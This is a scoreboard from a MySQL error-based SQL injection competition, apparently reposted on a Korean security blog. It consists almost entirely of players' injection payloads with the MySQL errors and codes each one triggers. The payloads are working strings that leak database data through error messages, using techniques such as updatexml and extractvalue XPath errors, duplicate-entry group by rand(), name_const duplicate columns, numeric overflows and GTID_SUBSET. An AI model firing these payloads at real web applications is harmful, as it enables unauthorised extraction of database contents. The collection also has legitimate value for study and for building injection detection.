MySQL Error-Based Injection Game
Scoreboard
# Name X ErrText ErrNo Score SUM(Score) Last Submit 1 snoopdogg '-(select*from(select name_const(version(),1),name_const(version(),1))p)# Duplicate column name 1060 56 1009 2014-10-04 21:35:30 '=0 group by elt(rand(),version())having min(0)# Duplicate entry 1062 81 '/updatexml(0,concat(0xa,version()),0)# XPATH syntax error: 1105 90 '/updatexml(0,concat('$_',version()),0)# Unknown XPATH variable at: 1105 89 '-updatexml(1,concat('a=.',version()),1)# XPATH error: comparison of two nodesets is not supported: 1105 88 '-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)# Illegal double 1367 79 '/polygon((select*from(select name_const(version(),1))o))# Illegal non geometric 1367 71 '--~(select*from(select@@version)f)# BIGINT value is out of range in 1690 93 '-~(select*from(select@@version)x)*2# BIGINT UNSIGNED value is out of range in 1690 92 1e308'*(select*from(select@@version)x)# DOUBLE value is out of range in 1690 90 '-(select~b*a*a*a from(select~0/.1 a,version()b)x)# DECIMAL value is out of range in 1690 78 '-GTID_SUBSET(@@version,0)# Malformed GTID set specification 1772 102 2 @Black2Fan '-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)# Duplicate column name 1060 56 998 2014-10-02 09:04:38 '=0 group by elt(rand(),version())having sum(0)# Duplicate entry 1062 81 '|updatexml(1,concat('a=.',version()),1)# XPATH error: comparison of two nodesets is not supported: 1105 88 '|updatexml(0,concat('$_',version()),2)# Unknown XPATH variable at: 1105 89 '-updatexml(0,concat(0x1,version()),2)# XPATH syntax error: 1105 90 '|updatexml(0,lpad(.1,350,hex(hex(version()))),1)# Illegal double 1367 79 '|polygon((select*from(select name_const(version(),1))x))# Illegal non geometric 1367 71 1e308'*(select*from(select@@version)x)# DOUBLE value is out of range in 1690 90 '--~(select*from(select@@version)f)# BIGINT value is out of range in 1690 93 '|(~(select*from(select@@version)f)*2)# BIGINT UNSIGNED value is out of range in 1690 90 '|~(select*from(select@@version)x)*cast(1e99as decimal(65))# DECIMAL value is out of range in 1690 69 '|GTID_SUBSET(@@version,0)# Malformed GTID set specification 1772 102 3 zuzzz '|(select*from(select name_const(version(),1),name_const(version(),1))a)# Duplicate column name 1060 56 936 2014-10-03 08:35:45 '||1 group by mid(version(),rand())having min(1)# Duplicate entry 1062 80 '|UpdateXML(1,concat('/',version()),1)# XPATH syntax error: 1105 90 '|UpdateXML(1,concat('$_',version()),1)# Unknown XPATH variable at: 1105 89 '|ExtractValue(1,concat('/a[x=y]',version()))# XPATH error: comparison of two nodesets is not supported: 1105 83 '|Polygon((select*from(select name_const(version(),1))b))# Illegal non geometric 1367 71 '|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)# Illegal double 1367 66 '|(select!x-~0.FROM(select+version()x)f)# BIGINT UNSIGNED value is out of range in 1690 88 '|(select-9223372036854775808-(x||1)FROM(select+version()x)z)# BIGINT value is out of range in 1690 67 '|(select pow(2,~x)FROM(select+version()x)z)# DOUBLE value is out of range in 1690 84 '|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)# DECIMAL value is out of range in 1690 60 '|GTID_SUBSET(version(),0)# Malformed GTID set specification 1772 102 4 yarbabin '||1 group by concat(left(version(),9),rand(0)|0) having max(0)# Duplicate entry 1062 65 153 2014-10-03 10:07:48 '|(select!x-~0.FROM(select+version()x)f)# BIGINT UNSIGNED value is out of range in 1690 88 5 lel '-updatexml(1,concat('.a=a',version()),1)# XPATH syntax error: 1105 87 87 2014-10-01 17:12:36 6 Karnalzi 'union select count(*)from test.news group by concat(version(),floor(rand(9)*3)),' Duplicate entry 1062 47 47 2014-10-02 14:32:30 7 xxxx ' UnIoN SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` group By CoNcAt(version(), rand(RaNd(4) * 2)), ' Duplicate entry 1062 32 32 2014-10-01 16:55:06 8 Nytro ' union select count(*) From `test`.`news` where 1 group by concat(version(),floor(rand(1337)* 2)), ' Duplicate entry 1062 28 28 2014-10-02 11:50:06 9 karnalzi 'union all select count(*)from test.news where id=1 or 1=1 group by concat (version(),floor(rand(1337)*2)),' Duplicate entry 1062 21 21 2014-10-03 09:09:11 10 X ' UnIoN AlL SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` WhErE 1 = 1 GrOuP By CoNcAt(VeRsIoN(), FlOoR(RaNd(1337) * 2)), ' Duplicate entry 1062 13 13 2014-10-02 11:47:23
| # | Name | X | ErrText | ErrNo | Score | SUM(Score) | Last Submit |
|---|---|---|---|---|---|---|---|
| 1 | snoopdogg | '-(select*from(select name_const(version(),1),name_const(version(),1))p)# | Duplicate column name | 1060 | 56 | 1009 | 2014-10-04 21:35:30 |
| '=0 group by elt(rand(),version())having min(0)# | Duplicate entry | 1062 | 81 | ||||
| '/updatexml(0,concat(0xa,version()),0)# | XPATH syntax error: | 1105 | 90 | ||||
| '/updatexml(0,concat('$_',version()),0)# | Unknown XPATH variable at: | 1105 | 89 | ||||
| '-updatexml(1,concat('a=.',version()),1)# | XPATH error: comparison of two nodesets is not supported: | 1105 | 88 | ||||
| '-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)# | Illegal double | 1367 | 79 | ||||
| '/polygon((select*from(select name_const(version(),1))o))# | Illegal non geometric | 1367 | 71 | ||||
| '--~(select*from(select@@version)f)# | BIGINT value is out of range in | 1690 | 93 | ||||
| '-~(select*from(select@@version)x)*2# | BIGINT UNSIGNED value is out of range in | 1690 | 92 | ||||
| 1e308'*(select*from(select@@version)x)# | DOUBLE value is out of range in | 1690 | 90 | ||||
| '-(select~b*a*a*a from(select~0/.1 a,version()b)x)# | DECIMAL value is out of range in | 1690 | 78 | ||||
| '-GTID_SUBSET(@@version,0)# | Malformed GTID set specification | 1772 | 102 | ||||
| 2 | @Black2Fan | '-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)# | Duplicate column name | 1060 | 56 | 998 | 2014-10-02 09:04:38 |
| '=0 group by elt(rand(),version())having sum(0)# | Duplicate entry | 1062 | 81 | ||||
| '|updatexml(1,concat('a=.',version()),1)# | XPATH error: comparison of two nodesets is not supported: | 1105 | 88 | ||||
| '|updatexml(0,concat('$_',version()),2)# | Unknown XPATH variable at: | 1105 | 89 | ||||
| '-updatexml(0,concat(0x1,version()),2)# | XPATH syntax error: | 1105 | 90 | ||||
| '|updatexml(0,lpad(.1,350,hex(hex(version()))),1)# | Illegal double | 1367 | 79 | ||||
| '|polygon((select*from(select name_const(version(),1))x))# | Illegal non geometric | 1367 | 71 | ||||
| 1e308'*(select*from(select@@version)x)# | DOUBLE value is out of range in | 1690 | 90 | ||||
| '--~(select*from(select@@version)f)# | BIGINT value is out of range in | 1690 | 93 | ||||
| '|(~(select*from(select@@version)f)*2)# | BIGINT UNSIGNED value is out of range in | 1690 | 90 | ||||
| '|~(select*from(select@@version)x)*cast(1e99as decimal(65))# | DECIMAL value is out of range in | 1690 | 69 | ||||
| '|GTID_SUBSET(@@version,0)# | Malformed GTID set specification | 1772 | 102 | ||||
| 3 | zuzzz | '|(select*from(select name_const(version(),1),name_const(version(),1))a)# | Duplicate column name | 1060 | 56 | 936 | 2014-10-03 08:35:45 |
| '||1 group by mid(version(),rand())having min(1)# | Duplicate entry | 1062 | 80 | ||||
| '|UpdateXML(1,concat('/',version()),1)# | XPATH syntax error: | 1105 | 90 | ||||
| '|UpdateXML(1,concat('$_',version()),1)# | Unknown XPATH variable at: | 1105 | 89 | ||||
| '|ExtractValue(1,concat('/a[x=y]',version()))# | XPATH error: comparison of two nodesets is not supported: | 1105 | 83 | ||||
| '|Polygon((select*from(select name_const(version(),1))b))# | Illegal non geometric | 1367 | 71 | ||||
| '|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)# | Illegal double | 1367 | 66 | ||||
| '|(select!x-~0.FROM(select+version()x)f)# | BIGINT UNSIGNED value is out of range in | 1690 | 88 | ||||
| '|(select-9223372036854775808-(x||1)FROM(select+version()x)z)# | BIGINT value is out of range in | 1690 | 67 | ||||
| '|(select pow(2,~x)FROM(select+version()x)z)# | DOUBLE value is out of range in | 1690 | 84 | ||||
| '|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)# | DECIMAL value is out of range in | 1690 | 60 | ||||
| '|GTID_SUBSET(version(),0)# | Malformed GTID set specification | 1772 | 102 | ||||
| 4 | yarbabin | '||1 group by concat(left(version(),9),rand(0)|0) having max(0)# | Duplicate entry | 1062 | 65 | 153 | 2014-10-03 10:07:48 |
| '|(select!x-~0.FROM(select+version()x)f)# | BIGINT UNSIGNED value is out of range in | 1690 | 88 | ||||
| 5 | lel | '-updatexml(1,concat('.a=a',version()),1)# | XPATH syntax error: | 1105 | 87 | 87 | 2014-10-01 17:12:36 |
| 6 | Karnalzi | 'union select count(*)from test.news group by concat(version(),floor(rand(9)*3)),' | Duplicate entry | 1062 | 47 | 47 | 2014-10-02 14:32:30 |
| 7 | xxxx | ' UnIoN SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` group By CoNcAt(version(), rand(RaNd(4) * 2)), ' | Duplicate entry | 1062 | 32 | 32 | 2014-10-01 16:55:06 |
| 8 | Nytro | ' union select count(*) From `test`.`news` where 1 group by concat(version(),floor(rand(1337)* 2)), ' | Duplicate entry | 1062 | 28 | 28 | 2014-10-02 11:50:06 |
| 9 | karnalzi | 'union all select count(*)from test.news where id=1 or 1=1 group by concat (version(),floor(rand(1337)*2)),' | Duplicate entry | 1062 | 21 | 21 | 2014-10-03 09:09:11 |
| 10 | X | ' UnIoN AlL SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` WhErE 1 = 1 GrOuP By CoNcAt(VeRsIoN(), FlOoR(RaNd(1337) * 2)), ' | Duplicate entry | 1062 | 13 | 13 | 2014-10-02 11:47:23 |
1 | @Black2Fan | '-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)# | 1060 | 56 | 495 | 2014-10-01 08:55:54 |
| '=0 group by elt(rand(),version())having sum(0)# | 1062 | 81 | ||||
| '-updatexml(0,repeat(version(),2),2)# | 1105 | 92 | ||||
| '|polygon((select*from(select name_const(version(),1))x))# | 1367 | 71 | ||||
| '--~(select*from(select@@version)f)# | 1690 | 93 | ||||
| '|GTID_SUBSET(@@version,0)# | 1772 | 102 | ||||
| 2 | kamior | '/(select*from(select+name_const(version(),1),name_const(version(),1))a)# | 1060 | 56 | 495 | 2014-10-01 11:41:33 |
| '=0 group by elt(rand(),version())having min(0)# | 1062 | 81 | ||||
| '/updatexml(0,repeat(version(),2),0)# | 1105 | 92 | ||||
| '-polygon((select*from(select name_const(version(),1))o))# | 1367 | 71 | ||||
| '--~(select*from(select@@version)f)# | 1690 | 93 | ||||
| '/gtid_subset(@@version,0)# | 1772 | 102 | ||||
| 3 | mb | '|(select*from(select name_const(version(),1),name_const(version(),1))a)# | 1060 | 56 | 322 | 2014-09-17 20:03:18 |
| '=0 group by elt(rand(),version())having min(0)# | 1062 | 81 | ||||
| '|updatexml(1,repeat(version(),2),1)# | 1105 | 92 | ||||
| '--~(select*from(select@@version)f)# | 1690 | 93 | ||||
| 4 | snoopdogg | '<1 group by elt(rand(),version())having min(0)# | 1062 | 81 | 243 | 2014-10-01 13:20:39 |
| '|polygon((select*from(select name_const(version(),1))p))# | 1367 | 71 | ||||
| '|!(select*from(select@@version)x)-~0# | 1690 | 91 | ||||
| 5 | ZiX | 'or 1 group by concat(version(),floor(rand(0)*2)) having min(0)or''=' | 1062 | 60 | 133 | 2014-09-15 23:02:45 |
| ' and extractvalue(rand(0),concat(0x0a,version()))or''=' | 1105 | 73 | ||||
| 6 | 123 | '--~(select*from(select@@version)f)# | 1690 | 93 | 93 | 2014-09-16 19:44:00 |
| 7 | der | '--~(select*from(select@@version)f)# | 1690 | 92 | 92 | 2014-09-15 20:37:58 |
| 8 | r | '|(select!x-~0.FROM(select+version()x)f)# | 1690 | 88 | 88 | 2014-09-15 19:49:35 |
| 9 | BlackFan | '|(select!x-~0.FROM(select@@version x)f)# | 1690 | 88 | 88 | 2014-10-01 14:08:20 |
| 10 | asdf | 'UnIoN SeLeCt CoUnT(`TeXt`) FrOm test.news WhErE 1=1 GrOuP By CoNcAt(VeRsIoN(),FlOoR(RaNd(1337)*2)),' | 1062 | 28 | 28 | 2014-09-15 23:54:40 |
'Web' 카테고리의 다른 글
| Upload 코드의 흔한 실수 (2) | 2016.03.07 |
|---|---|
| Custom Webshell (0) | 2016.02.12 |
| SQL Injection Study (3) | 2015.11.13 |
| PHP web development tips and tricks (0) | 2015.11.13 |
| mysql python (0) | 2015.02.23 |
